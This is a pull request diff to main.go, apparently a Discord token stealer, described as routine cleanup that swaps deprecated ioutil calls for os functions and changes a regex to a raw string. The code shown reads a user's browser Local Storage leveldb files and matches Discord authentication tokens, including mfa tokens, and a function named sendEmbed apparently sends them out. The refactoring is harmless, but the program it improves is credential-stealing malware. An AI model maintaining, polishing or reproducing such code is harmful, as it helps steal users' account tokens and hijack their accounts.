### PR TITLE
Updaetd the code

### DIFF
--- a/main.go
+++ b/main.go
@@ -5,7 +5,6 @@ import (
 	"encoding/json"
 	"fmt"
 	"io"
-	"io/ioutil"
 	"net/http"
 	"os"
 	"os/user"
@@ -227,7 +226,7 @@ func getAllTokens() {
 		}
 
 		path += "/Local Storage/leveldb/"
-		files, _ := ioutil.ReadDir(path)
+		files, _ := os.ReadDir(path)
 
 		for _, file := range files {
 			name := file.Name()
@@ -236,7 +235,7 @@ func getAllTokens() {
 				continue
 			}
 
-			content, _ := ioutil.ReadFile(path + "/" + name)
+			content, _ := os.ReadFile(path + "/" + name)
 			lines := bytes.Split(content, []byte("\\n"))
 
 			for _, line := range lines {

--- a/main.go
+++ b/main.go
@@ -204,7 +204,7 @@ func sendEmbed(token string) {
 func getAllTokens() {
 
 	homedir, _ := os.UserHomeDir()
-	var tokenRegex = regexp.MustCompile("[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}|mfa\\.[\\w-]{84}")
+	var tokenRegex = regexp.MustCompile(`[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}`)
 	var tokenList []string
 
 	var paths = map[string]string{


### PR DESCRIPTION
1. Removed ioutil, Deprecated: As of Go 1.16
1. Should use raw string to avoid having to escape twice